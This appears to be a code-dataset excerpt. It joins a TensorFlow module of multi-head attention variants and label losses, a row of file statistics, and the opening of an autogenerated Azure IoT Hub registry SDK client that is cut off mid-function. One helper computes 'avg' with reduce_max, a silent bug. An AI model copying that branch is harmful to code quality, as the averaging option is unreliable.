keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
attention_evidence = tf.reduce_sum(
attention_evidence, axis=1)
elif token_scoring_method == "max":
attention_evidence = tf.reduce_max(
attention_evidence, axis=1)
elif token_scoring_method == "avg":
attention_evidence = tf.reduce_mean(
attention_evidence, axis=1)
elif token_scoring_method == "logsumexp":
attention_evidence = tf.reduce_logsumexp(
attention_evidence, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
# Apply a non-linear layer to obtain un-normalized attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
tiled_sentence_lengths = tf.tile(
input=tf.sequence_mask(sentence_lengths), multiples=[num_heads, 1])
attention_weights_unnormalized = tf.where(
tiled_sentence_lengths,
attention_weights_unnormalized,
tf.zeros_like(attention_weights_unnormalized))
# Normalize to obtain attention weights of shape [B*num_heads, M].
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True)
token_scores = tf.concat(
tf.split(tf.expand_dims(attention_weights_unnormalized, axis=2), num_heads),
axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
if use_inputs_instead_values:
product = tf.reduce_sum(inputs * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
else:
product = tf.reduce_sum(values * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_6(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
scoring_activation=None,
token_scoring_method="max",
separate_heads=True):
"""
Variant 6 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_6"):
num_units = inputs.get_shape().as_list()[-1]
keys_list = []
queries_list = []
values_list = []
for i in range(num_heads):
with tf.variable_scope("num_head_{}".format(i), reuse=tf.AUTO_REUSE):
keys_this_head = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
queries_this_head = tf.layers.dense(
inputs, num_units, activation=tf.nn.relu,
kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.7),
kernel_initializer=initializer) # [B, M, num_units]
values_this_head = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys_list.append(keys_this_head)
queries_list.append(queries_this_head)
values_list.append(values_this_head)
keys = tf.stack(keys_list) # [num_heads, B, M, num_units]
queries = tf.stack(queries_list) # [num_heads, B, M, num_units]
values = tf.stack(values_list) # [num_heads, B, M, num_units]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 1, 3, 2])) # [num_heads, B, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask_2(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask_2(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask_2(
attention_weights_unnormalized, queries, keys, mask_type="query")
# [num_heads, B, M, num_units]
product = tf.matmul(attention_weights, values)
product = tf.reduce_sum(product, axis=2) # [num_heads, B, num_units]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [num_heads, B, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [num_heads, B, 1]
processed_tensor = tf.transpose(
tf.squeeze(processed_tensor, axis=-1), [1, 0]) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights. Shape is [num_heads, B, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(attention_weights_unnormalized, axis=2)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(attention_weights_unnormalized, axis=2)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.transpose(token_scores, [1, 2, 0]) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.transpose(attention_weights, [1, 2, 3, 0]) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def get_token_representative_values(token_probabilities, approach):
"""
Obtains the token probabilities representative for each head across the sentence.
:param token_probabilities: the softmaxed token scores.
:param approach: how to get the representations (max, avg, log).
:return: token_representative_values of shape [batch_size, num_heads].
"""
if "max" in approach:
token_representative_values = tf.reduce_max(
token_probabilities, axis=1)
elif "avg" in approach:
token_representative_values = tf.reduce_max(
token_probabilities, axis=1)
elif "log" in approach:
token_representative_values = tf.reduce_logsumexp(
token_probabilities, axis=1)
else:
raise ValueError("Unknown approach for getting "
"token representative values: %s." % approach)
return token_representative_values # [B, num_heads]
def get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels):
"""
Obtains one-hot sentence representations.
:param sentence_labels: ground truth sentence labels.
:param num_sent_labels: total number of unique sentence labels.
:param num_tok_labels: total number of unique token labels.
:return: one hot sentence labels, corresponding to the token labels.
"""
one_hot_sentence_labels = tf.one_hot(
tf.cast(sentence_labels, tf.int64),
depth=num_sent_labels)
if num_sent_labels == 2 and num_sent_labels != num_tok_labels:
# Get the default and non-default sentence labels.
default_sentence_labels = tf.gather(
one_hot_sentence_labels, indices=[0], axis=-1) # [B x 1]
non_default_sentence_labels = tf.gather(
one_hot_sentence_labels, indices=[1], axis=-1) # [B x 1]
# Tile the non-default one (num_tok_labels - 1) times.
tiled_non_default_sentence_labels = tf.tile(
input=non_default_sentence_labels,
multiples=[1, num_tok_labels - 1])
# Get one-hot sentence labels of shape [B, num_tok_labels].
one_hot_sentence_labels = tf.concat(
[default_sentence_labels, tiled_non_default_sentence_labels],
axis=-1, name="one_hot_sentence_labels_concatenation")
return one_hot_sentence_labels # [B, num_tok_labels]
def compute_attention_loss(
token_probabilities, sentence_labels,
num_sent_labels, num_tok_labels,
approach, compute_pairwise=False):
"""
Attention-level loss -- currently, implementation possible only in two cases:
1. The number of sentence labels is equal to the number of token labels.
In this case, the attention loss is computed element-wise (for each label).
2. The number of sentence labels is 2, while the number of tokens is arbitrary.
In this case, two scores are computed from the token scores:
* one corresponding to the default label
* one corresponding to the rest of labels (non-default labels)
:param token_probabilities: 3D tensor, shape [B, M, num_tok_labels]
that are normalized across heads (last axis).
:param sentence_labels: 2D tensor, shape [B, num_labels_tok]
:param num_sent_labels: number of unique sentence labels.
:param num_tok_labels: number of unique token labels.
:param approach: method to extract token representation values.
:param compute_pairwise: whether to compute the loss pairwise or not.
:return: a number representing the sum over attention losses computed.
"""
if num_sent_labels == num_tok_labels or num_sent_labels == 2:
# Compute the token representations based on the approach selected.
token_representative_values = get_token_representative_values(
token_probabilities, approach) # [B, num_heads]
one_hot_sentence_labels = get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels)
if compute_pairwise:
attention_loss = tf.losses.mean_pairwise_squared_error(
labels=label_smoothing(one_hot_sentence_labels, epsilon=0.15),
predictions=token_representative_values, weights=1.15)
else:
attention_loss = tf.square(
token_representative_values -
label_smoothing(one_hot_sentence_labels, epsilon=0.15))
else:
raise ValueError(
"You have different number of token labels (%d) and "
"sentence labels (%d, which is non-binary). "
"We don't support attention loss for such a case!"
% (num_tok_labels, num_sent_labels))
return attention_loss
def compute_gap_distance_loss(
token_probabilities, sentence_labels,
num_sent_labels, num_tok_labels,
minimum_gap_distance, approach,
type_distance):
"""
Gap-distance loss: the intuition is that the gap between the default
and non-default scores should be wider than a certain threshold.
:param token_probabilities: 3D tensor, shape [B, M, num_tok_labels]
that are normalized across heads (last axis).
:param sentence_labels: 2D tensor, shape [B, num_labels_tok]
:param num_sent_labels: number of unique sentence labels.
:param num_tok_labels: number of unique token labels.
:param minimum_gap_distance: the minimum distance gap imposed between
scores corresponding tot he default or non-default gold sentence label.
:param approach: method to extract token representation values.
:param type_distance: type of gap distance loss that you want.
:return: a number representing the sum over gap-distance losses.
"""
if num_sent_labels == num_tok_labels or num_sent_labels == 2:
# Compute the token representations based on the approach selected.
token_representative_values = get_token_representative_values(
token_probabilities, approach) # [B, num_heads]
one_hot_sentence_labels = get_one_hot_of_token_labels_length(
sentence_labels, num_sent_labels, num_tok_labels)
valid_tokens = tf.multiply(
tf.cast(one_hot_sentence_labels, tf.float32),
token_representative_values) # [B, num_tok_labels]
tokens_default_head_correct = tf.squeeze(tf.gather(
valid_tokens, indices=[0], axis=-1), axis=-1) # [B]
tokens_default_head_incorrect = tf.squeeze(tf.gather(
token_representative_values, indices=[0], axis=-1), axis=-1) # [B]
tokens_non_default_head_correct = tf.squeeze(
tf.reduce_max(tf.gather(
valid_tokens,
indices=[[i] for i in range(1, num_tok_labels)],
axis=-1), axis=1), axis=-1)
tokens_non_default_head_incorrect = tf.squeeze(
tf.reduce_max(tf.gather(
token_representative_values,
indices=[[i] for i in range(1, num_tok_labels)],
axis=-1), axis=1), axis=-1)
heads_correct = tf.stack(
[tokens_default_head_correct, tokens_non_default_head_correct],
axis=-1) # [B, 2]
heads_incorrect = tf.stack(
[tokens_default_head_incorrect, tokens_non_default_head_incorrect],
axis=-1) # [B, 2]
y_heads = tf.where(
tf.equal(tf.cast(tokens_non_default_head_correct, tf.int32), 0),
one_hot_sentence_labels,
tf.ones_like(one_hot_sentence_labels) - one_hot_sentence_labels)
"""
heads_correct = tf.where(
tf.equal(tf.cast(tokens_non_default_head, tf.int32), 0),
tokens_default_head,
tokens_non_default_head)
heads_incorrect = tf.where(
tf.equal(tf.cast(tokens_default_head, tf.int32), 0),
tokens_default_head,
tokens_non_default_head)
"""
if type_distance == "distance_only":
# loss = max(0.0, threshold - |correct - incorrect|).
gap_loss = tf.math.maximum(
0.0,
tf.math.subtract(
minimum_gap_distance,
tf.math.abs(tf.subtract(
tokens_default_head_incorrect,
tokens_non_default_head_incorrect))))
elif type_distance == "contrastive":
squared_euclidean_distance = tf.reduce_sum(
tf.square(heads_correct - heads_incorrect))
# loss = y * dist + (1 - y) * max(0.0, threshold - d).
gap_loss = tf.add(
tf.multiply(tf.ones_like(y_heads) - y_heads,
squared_euclidean_distance),
tf.multiply(y_heads,
tf.maximum(0.0,
minimum_gap_distance - squared_euclidean_distance)))
else:
# loss =
# [exp(max(0.0, threshold - |correct - incorrect|))
# * (1.0 + max(correct, incorrect) - x_correct)
# * (1.0 + incorrect - min(correct, incorrect))] - 1.0
gap_loss = tf.subtract(
tf.math.exp(tf.math.maximum(
0.0, minimum_gap_distance - tf.math.abs(heads_correct - heads_incorrect)))
* tf.add(1.0, tf.math.maximum(heads_correct, heads_incorrect) - heads_correct)
* tf.add(1.0, heads_incorrect - tf.math.minimum(heads_correct, heads_incorrect)),
1.0)
else:
raise ValueError(
"You have different number of token labels (%d) and "
"sentence labels (%d, which is non-binary). "
"We don't support attention loss for such a case!"
% (num_tok_labels, num_sent_labels))
return gap_loss
| 48.021277 | 102 | 0.640741 | 12,491 | 103,822 | 5.086382 | 0.040029 | 0.065729 | 0.017392 | 0.020037 | 0.851182 | 0.82411 | 0.795275 | 0.776214 | 0.756556 | 0.737196 | 0 | 0.009906 | 0.272688 | 103,822 | 2,161 | 103 | 48.043498 | 0.831482 | 0.25641 | 0 | 0.768293 | 0 | 0 | 0.045904 | 0.019264 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01626 | false | 0 | 0.001355 | 0 | 0.034553 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ddea83584164559e553a311004646fffd24ae3b | 37,548 | py | Python | azext_iot/sdk/iothub/service/operations/registry_manager_operations.py | YingXue/azure-iot-cli-extension | efe7897b1ae1d2a9953f501abe7654b84d69372d | [
"MIT"
] | null | null | null | azext_iot/sdk/iothub/service/operations/registry_manager_operations.py | YingXue/azure-iot-cli-extension | efe7897b1ae1d2a9953f501abe7654b84d69372d | [
"MIT"
] | null | null | null | azext_iot/sdk/iothub/service/operations/registry_manager_operations.py | YingXue/azure-iot-cli-extension | efe7897b1ae1d2a9953f501abe7654b84d69372d | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class RegistryManagerOperations(object):
"""RegistryManagerOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the Api. Constant value: "2019-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-10-01"
self.config = config
def get_device_statistics(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieves statistics about device identities in the IoT hub’s identity
registry.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: RegistryStatistics or ClientRawResponse if raw=true
:rtype: ~service.models.RegistryStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_device_statistics.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RegistryStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device_statistics.metadata = {'url': '/statistics/devices'}
def get_service_statistics(
self, custom_headers=None, raw=False, **operation_config):
"""Retrieves service statistics for this IoT hub’s identity registry.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ServiceStatistics or ClientRawResponse if raw=true
:rtype: ~service.models.ServiceStatistics or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_service_statistics.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServiceStatistics', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_service_statistics.metadata = {'url': '/statistics/service'}
def get_devices(
self, top=None, custom_headers=None, raw=False, **operation_config):
"""Get the identities of multiple devices from the IoT hub identity
registry. Not recommended. Use the IoT Hub query language to retrieve
device twin and device identity information. See
https://docs.microsoft.com/en-us/rest/api/iothub/service/queryiothub
and
https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-devguide-query-language
for more information.
:param top: This parameter when specified, defines the maximum number
of device identities that are returned. Any value outside the range of
1-1000 is considered to be 1000.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Device] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_devices.metadata['url']
# Construct parameters
query_parameters = {}
if top is not None:
query_parameters['top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Device]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_devices.metadata = {'url': '/devices'}
def bulk_device_crud(
self, devices, custom_headers=None, raw=False, **operation_config):
"""Create, update, or delete the identities of multiple devices from the
IoT hub identity registry.
Create, update, or delete the identiies of multiple devices from the
IoT hub identity registry. A device identity can be specified only once
in the list. Different operations (create, update, delete) on different
devices are allowed. A maximum of 100 devices can be specified per
invocation. For large scale operations, consider using the import
feature using blob
storage(https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-identity-registry#import-and-export-device-identities).
:param devices:
:type devices: list[~service.models.ExportImportDevice]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BulkRegistryOperationResult or ClientRawResponse if raw=true
:rtype: ~service.models.BulkRegistryOperationResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.bulk_device_crud.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(devices, '[ExportImportDevice]')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('BulkRegistryOperationResult', response)
if response.status_code == 400:
deserialized = self._deserialize('BulkRegistryOperationResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
bulk_device_crud.metadata = {'url': '/devices'}
def query_iot_hub(
self, query=None, x_ms_continuation=None, x_ms_max_item_count=None, custom_headers=None, raw=False, **operation_config):
"""Query an IoT hub to retrieve information regarding device twins using a
SQL-like language.
Query an IoT hub to retrieve information regarding device twins using a
SQL-like language. See
https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-query-language
for more information. Pagination of results is supported. This returns
information about device twins only.
:param x_ms_continuation:
:type x_ms_continuation: str
:param x_ms_max_item_count:
:type x_ms_max_item_count: str
:param query: The query.
:type query: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Twin] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
query_specification = models.QuerySpecification(query=query)
# Construct URL
url = self.query_iot_hub.metadata['url']
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_continuation is not None:
header_parameters['x-ms-continuation'] = self._serialize.header("x_ms_continuation", x_ms_continuation, 'str')
if x_ms_max_item_count is not None:
header_parameters['x-ms-max-item-count'] = self._serialize.header("x_ms_max_item_count", x_ms_max_item_count, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(query_specification, 'QuerySpecification')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
# @digimaun - custom work, cut the fluff
return ClientRawResponse(None, response)
query_iot_hub.metadata = {'url': '/devices/query'}
def get_device(
self, id, custom_headers=None, raw=False, **operation_config):
"""Retrieve a device from the identity registry of an IoT hub.
Retrieve a device from the identity registry of an IoT hub.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Device or ClientRawResponse if raw=true
:rtype: ~service.models.Device or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Device', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device.metadata = {'url': '/devices/{id}'}
def create_or_update_device(
self, id, device, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Create or update the identity of a device in the identity registry of
an IoT hub.
Create or update the identity of a device in the identity registry of
an IoT hub. An ETag must not be specified for the create operation. An
ETag must be specified for the update operation. Note that generationId
and deviceId cannot be updated by the user.
:param id: Device ID.
:type id: str
:param device:
:type device: ~service.models.Device
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Device or ClientRawResponse if raw=true
:rtype: ~service.models.Device or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
